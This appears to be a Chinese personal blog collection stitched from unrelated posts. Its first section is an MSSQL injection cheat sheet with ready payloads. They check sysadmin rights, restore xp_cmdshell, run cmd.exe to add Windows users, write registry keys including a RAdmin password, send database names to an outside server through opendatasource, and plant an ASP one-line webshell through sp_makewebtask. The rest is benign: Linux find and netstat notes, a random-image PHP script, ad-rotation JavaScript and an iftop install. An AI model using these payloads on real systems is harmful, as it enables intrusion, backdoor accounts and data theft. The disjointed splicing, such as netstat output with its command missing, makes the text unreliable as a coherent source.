//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(‘master’))
And char(124)%2BCast(HAS_DBACCESS(‘master’) as varchar(1))%2Bchar(124)=1 –

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
‘ and char(124)%2Buser%2Bchar(124)=0 and ”=’

搜索类型
‘ and char(124)%2Buser%2Bchar(124)=0 and ‘%’=’

爆用户名
and user>0
‘ and user>0 and ”=’

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 –

检测是不是MSSQL数据库
and exists (select * from sysobjects);–

检测是否支持多行
;declare @d int;–

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc ‘xp_cmdshell’,'xplog70.dll’;–

select * from openrowset(‘sqloledb’,'server=192.168.1.200,1433;uid=test;pwd=pafpaf’,'select @@version’)

//———————–
// 执行命令
//———————–
首先开启沙盘模式：
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Jet\4.0\Engines’,'SandBoxMode’,'REG_DWORD’,1

然后利用jet.oledb执行系统命令
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\winnt\system32\ias\ias.mdb’,'select shell(“cmd.exe /c net user admin admin1234 /add”)’)

执行命令
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;–

EXEC [master].[dbo].[xp_cmdshell] ‘cmd /c md c:\1111′

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’)

写注册表
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Jet\4.0\Engines’,'SandBoxMode’,'REG_DWORD’,1

REG_SZ

读注册表
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,'Userinit’

读取目录内容
exec master..xp_dirtree ‘c:\winnt\system32\’,1,1

数据库备份
backup database pubs to disk = ‘c:\123.bak’

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;–

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,’新密码’,'sa’

添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc ‘xp_cmdshell’

添加扩展存储过过程
EXEC [master]..sp_addextendedproc ‘xp_proxiedadata’, ‘c:\winnt\system32\sqllog.dll’
GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol ‘stop’,'schedule’
exec master..xp_servicecontrol ‘start’,'schedule’

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails ‘C:\Inetpub\wwwroot\SQLInject\login.asp’

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
‘c:\test.cab’,'mszip’,1,
‘C:\Inetpub\wwwroot\SQLInject\login.asp’,
‘C:\Inetpub\wwwroot\SQLInject\securelogin.asp’

xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab ‘c:\test.cab’,'c:\temp’,1

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SYSTEM\RAdmin\v2.0\Server\Parameters’,'Parameter’,'REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SYSTEM\RAdmin\v2.0\Server\Parameters’,'port’,'REG_BINARY’,0xd20400 则端口值改为1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource(‘sqloledb’,'server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);–

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123′;exec%20sp_makewebtask%20′d:\www\tt\88.asp’,'%20select%20”<%25execute(request("a"))%25>”%20′;–

//更新表内容
Update films SET kind = ‘Dramatic’ Where id = 123

//删除内容
delete from table_name where Stockid = 3

一个同学问我在linux怎样按修改时间来查找文件，我Google之后才得到答案，写个笔记吧。
find /home/admin -mtime -1      #查找/home/admin目录下修改时间在1天之内的文件
find /home/admin -name *.txt -mtime -1  #查找/home/admin目录下修改时间在1天之内的文件名为.txt结尾的文件

find 按文件修改时间查找文件
—(+n)———-|———-(n)———-|———-(-n)—
(n+1)*24H前|   (n+1)*24H~n*24H间   |n*24H内

-ctime -n    查找距现在 n*24H 内修改过的文件
-ctime n    查找距现在 n*24H 前, (n+1)*24H 内修改过的文件
-ctime +n    查找距现在 (n+1)*24H 前修改过的文件

[a|c|m]min    [最后访问|最后状态修改|最后内容修改]min
[a|c|m]time    [最后访问|最后状态修改|最后内容修改]time

linux 文件的三种时间(以 find 为例):
atime 最后一次访问时间, 如 ls, more 等, 但 chmod, chown, ls, stat 等不会修改些时间, 使用 ls -utl 可以按此时间顺序查看;
ctime 最后一次状态修改时间, 如 chmod, chown 等状态时间改变但修改时间不会改变, 使用 stat file 可以查看;
mtime 最后一次内容修改时间, 如 vi 保存后等, 修改时间发生改变的话, atime 和 ctime 也相应跟着发生改变.

注意: linux 里是不会记录文件的创建时间的, 除非这个文件自创建以来没有发生改变, 那么它的创建时间就是它的最后一次修改时间.
#ls -lt /home/admin   # 按修改时间顺序查看
#ls -lut /home/admin  # 按访问时间顺序查看
(如果想反序查看的话需要加一个选项 -r)

只不过最近度娘的蜘蛛是去度假了，还是怎么的，很久没有来访问我们的站点了，我这个Blog倒是天天快照，其他网站很久没没有光顾了。就连新站也是没有主动收录，我得做点什么吸引下注意力才行，比如说在我这边文章下面加个链接之类的。

最近新做的一个资源类的论坛
寻易论坛
目前主要更新最新电影。

还有点什么呢，暂时想不起来了，想起来再说吧。

pic.php内容如下:
<?php
$arr=file('list.txt');
$n=count($arr)-1;
header('Location: http://prodigyu.com/pic/'.$arr[rand(0,$n)]);
?>
list.txt就是所有图片的列表
用命令

ls /图片所在文件夹 > list.txt

网上有代码是历编图片文件夹,然后随机选一个图片,这个方法比较耗费cpu
所以我先生成一个list,然后只需要读一个txt就可以了
速度比较快,也不占资源
如果想要方便查看,可以建一个index.html

<script language=javascript>
document.onkeydown=nextpage
function nextpage(event)
{
event = event ? event : (window.event ? window.event : null);
if (event.keyCode==39) window.location.reload();//右方向键
}
< /script>
< img src="http://prodigyu.com/pic.php" alt="" />

昨天出现的症状,重启后硬盘自动自检,等到今天看居然还卡在那里,跳过自检进入系统后发现硬盘读取速度已经不正常了,在拖第一个分区文件的时候就出现了无法读取,结果之后再也没有办法读取任何文件.

试过用WinHex无果,连文件夹都不能列出,暂时没有时间管它了,等有空了再试试看有没办法恢复部分出来,目前已经把硬盘取下.

我这台机器从2003年一直用到现在虽说其中更换过几次主板CPU的,但还是该换换了吧,准备下次组个软RAID1避免这种悲剧再次发生.

另外我发现在现在百度秒收我这经常不更新的BLOG.

CPC就是按点击(Click)计算，CPM就是按弹窗(Mxxx?)计算，CPA/CPS一个是按注册一个是按销售计算，CPV则是按显示次数计算。于是CPC,CPA,CPS这种根据网站访客行为来获得收益的是一类，而CPM和CPV这种只和网站流量相关的则是另一类。

可想而知，CPC，CPA，CPS的效果要分析访客群体，点击习惯等诸多要素来进行调整，非一蹴而就，这篇文章中我主要想研究怎么从流量上做文章，在不作弊的情况下获取尽可能多的收益；等广告联盟用得多了，时间长了，也会给一点不同广告联盟的评价。
1. 最基本的投放

以A5联盟(貌似是站长网的直属联盟，应该比较可信，所以还是拿它来做例子吧)为例，直接在网页任意地方嵌入类似代码就能生成在右下角悬浮的展示广告了。

<script type="text/javascript">
 u_a_client="20326";
 u_a_width="270";
 u_a_height="200";
 u_a_zones="37972";
 u_a_type="1"
</script>
<script src="http://www.admin6.com/i.js"></script>

2. 不同广告联盟的同类广告轮播

因为CPV/CPM是按IP计算浏览量的，那么同一用户反复浏览同一广告是不会增加收入的，所以引入轮播机制。

通常情况下，如果是同一个联盟，那么是自动随机轮播的，但是如果想在不同的联盟的CPV广告之间进行轮播，又该如何呢。

其实可以自己来搞随机，通过javascript脚本，在相应位置随机产生代码。可以定义文件 dynamic.js，然后在相应位置引入

<script type="text/javascript" src="dynamic.js"></script>

然后dynamic.js利用document.write以及Math.random函数来实现动态展示不同网站的广告，这里我用了另一个广告联盟太极圈（这个联盟我看playsc.com在用所以也申请了）的广告。代码如下：

var choice = Math.random()*2;
if (choice<=1){
    document.write('<script type="text/javascript">u_a_client="20685";u_a_width="270";u_a_height="200";u_a_zones="63336";u_a_type="1";<\/script><script src="http://js.tjq.com/i.js"><\/script>');
}else{
    document.write('<script type="text/javascript">u_a_client="20326";u_a_width="270";u_a_height="200";u_a_zones="37972";u_a_type="1";<\/script><script src="http://www.admin6.com/i.js"><\/script>');
}

显然，如果有3个需要展示的，那么random*3，并且放上三个分支就行了，以此类推。这只是一种形式，如果有很多广告的话，可以定义一个dynamic.js文件，把上述代码放在函数cpv里面，然后在相应的地方调用cpv函数也可。这样方便统一管理广告。

另外这样做的另一个好处是，静态化的页面不用重新生成，只用修改dynamic.js的内容，即可以修改广告内容。

使用中发现，javascript的随机数生成并不太靠谱，所以也可以摒弃Math.random方法，改用奇偶时间法：奇数分钟显示A广告，偶数分钟显示B广告，甚至可以按秒数来分，最多支持60个广告轮播（好变态-.-）。这个方法的基本思想是，只要浏览网页超过时间片的长度（我这里用的是分钟），那么必然会同时浏览到两个广告。dynamic.js的代码修改如下

var now = new Date();
var minutes = now.getMinutes();
if (minutes%2==0){
    document.write('<script type="text/javascript">u_a_client="20685";u_a_width="270";u_a_height="200";u_a_zones="63336";u_a_type="1";<\/script><script src="http://js.tjq.com/i.js"><\/script>');
}else{
    document.write('<script type="text/javascript">u_a_client="20326";u_a_width="270";u_a_height="200";u_a_zones="37972";u_a_type="1";<\/script><script src="http://www.admin6.com/i.js"><\/script>');
}

奇偶时间法的另一个优势在于可以比较哪个广告联盟量比较足，因为可想而之奇偶时间分配的话，一般来说两个联盟分配到的点击数都应该差不多的，然而根据我的测试，太极圈似乎比A5联盟的CPV次数会多上10%。这可能只是个别现象，仅作参考，不做为推荐。

3. 终极轮播绝招

使用2的那些方法以后，比起单联盟来说，广告投放效果立刻*1.5，但是这还是不够。我们应该更贪心一点：要压榨光每一个IP的用户流量。

怎样才能压榨干净呢？试想一下这个算法：

• 用户当天第一次来访，显示广告1
• 用户当天第二次来访，显示广告2
• ……

只要用户访问次数小于现存广告的个数，那么他每次访问都会显示不一样的广告，点几次页面就显示几次广告！CPV广告就真正名副其实地是Cost Per View了。（但是这么做会不会被误认为是作弊？因为明显展示数和统计数比例太高了，看上去像假的，这个需要衡量）

还有一个问题是，怎么确定用户第几次访问，从而显示第几个广告呢？最朴素的想法莫过于建立一个本机的流量统计系统，例如piwik系统，然后查询本地数据库，我一开始的确想这么实现，但是可想而知这会多么拖累主机的性能。想想看，javascript有没有办法自己来保存那些访问信息呢？

其实是有的，那就是本机cookies，只要自动记录cookie，那么用户是第几次来那就显而易见了；而且由于cookie有自动超时机制，我们只要让它把超时设为24小时，那么第二天就可以自动重新统计了。

首先，需要有set_cookie以及get_cookie函数

function set_cookie(name,value,expires){
    var today = new Date();
    today.setTime( today.getTime() );
    expires = expires*1000;
    var expires_date = new Date(today.getTime()+(expires));
    document.cookie=name+"="+escape(value)+";expires="+expires_date.toGMTString()+";domain=simplecd.org";
}
function get_cookie(name){
    var i,x,y,ARRcookies=document.cookie.split(";");
    for (i=0;i<ARRcookies.length;i++){
        x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
        y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
        x=x.replace(/^\s+|\s+$/g,"");
        if (x==name){
            return unescape(y);
        }
    }
}

然后，我们可以稍微修改一下算法，简化代码：为各个广告建立自己的cookie，值为访问次数

新算法如下：

• 遍历各广告位的cookie
• 如果有不存在的cookie，则显示该广告位，并且设置cookie
• 如果cookie全部存在则显示任意广告或者不显示，同时更新所显示广告的cookie

更进一步地，为了那个悬浮窗不要那么扰民，也可以再加上一条：

• 如果用户已显示广告总次数大于6次，那么今天就不显示该类广告。

整个接下来的代码如下：

var total_ad = 3;
var max_show = 6;
var cookie_pre = 'cpvad_counter_';
var cookie_time = 60*60*8;
var show = -1; // show ad id
var show_counter = 0;
// first pass, round robin
for (var i=0;i<total_ad;i++) {
    var cookie_name = cookie_pre+i;
    var counter = get_cookie(cookie_name);
    if ( counter ){
        show_counter += parseInt(counter);
    }else{
        show = i;
        break;
    }
}
// show if not showed more than max_show times
if (show_counter < max_show){
    // second pass, random show
    if (show == -1){
        show = Math.floor(Math.random()*total_ad);
    }
    // handle cookie
    var cookie_name = cookie_pre+show
    var cookie_value = get_cookie(cookie_name);
    if (cookie_value){
        set_cookie(cookie_name,''+(parseInt(cookie_value)+1),cookie_time);
    }else{
        set_cookie(cookie_name,'1',cookie_time);
    }
    // show add
    switch(show){
        case 0:
            document.write('<script type="text/javascript">u_a_client="20685";u_a_width="270";u_a_height="200";u_a_zones="63336";u_a_type="1";<\/script><script src="http://js.tjq.com/i.js"><\/script>');
            break;
        case 1:
            document.write('<script type="text/javascript">u_a_client="20326";u_a_width="270";u_a_height="200";u_a_zones="37972";u_a_type="1";<\/script><script src="http://www.admin6.com/i.js"><\/script>');
            break;
        case 2:
            document.write('<script type="text/javascript">u_a_client="20685";u_a_width="283";u_a_height="189";u_a_zones="63369";u_a_type="1";<\/script><script src="http://js.tjq.com/i.js"><\/script>');
            break;
    }
}

4.小结

本文从技术上分析并实现了CPV类广告的轮播最大化收益，至于同类的CPM广告，那也是与此同理。

然而广告投放可不只是耍耍这么点javascript就能实现效用最大化的，还有CPC/CPA/CPS等其他广告类别，还有数量和质量的关系，位置与显示速度的关系，扰民和效果的关系等等一大堆的东西可以研究。

在互联网广告投放上，我只是才投了1周广告的新人而已，还有很多需要学习和研究的，所以这篇文的标题是(一)，再又有心得，自认为可以单独成文的时候，那就是(二)了，然而目前我只是大概有个试验思路，什么时候去做和什么时候能成文，那就不知道了。

本文转自:http://obmem.info/?p=844

LAST_ACK 1
SYN_RECV 14
ESTABLISHED 79
FIN_WAIT1 28
FIN_WAIT2 3
CLOSING 5
TIME_WAIT 1669

也就是说，这条命令可以把当前系统的网络连接状态分类汇总。

下面解释一下为啥要这样写：

一个简单的管道符连接了netstat和awk命令。

——————————————————————

先来看看netstat：

netstat -n

Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 123.123.123.123:80 234.234.234.234:12345 TIME_WAIT

你实际执行这条命令的时候，可能会得到成千上万条类似上面的记录，不过我们就拿其中的一条就足够了。

——————————————————————

再来看看awk：

/^tcp/
滤出tcp开头的记录，屏蔽udp, socket等无关记录。

state[]
相当于定义了一个名叫state的数组

NF
表示记录的字段数，如上所示的记录，NF等于6

$NF
表示某个字段的值，如上所示的记录，$NF也就是$6，表示第6个字段的值，也就是TIME_WAIT

state[$NF]
表示数组元素的值，如上所示的记录，就是state[TIME_WAIT]状态的连接数

++state[$NF]
表示把某个数加一，如上所示的记录，就是把state[TIME_WAIT]状态的连接数加一

END
表示在最后阶段要执行的命令

for(key in state)
遍历数组

print key,”\t”,state[key]
打印数组的键和值，中间用\t制表符分割，美化一下。

安装iftop

wget http://www.ex-parrot.com/~pdw/iftop/download/iftop-0.17.tar.gz
tar zxvf iftop-0.17.tar.gz
cd iftop-0.17
./configure
make
make install

安装完后使用命令
iftop -i eth0 -n 查看eth0的流量
退出按q

卸载:make clean iftop-0.17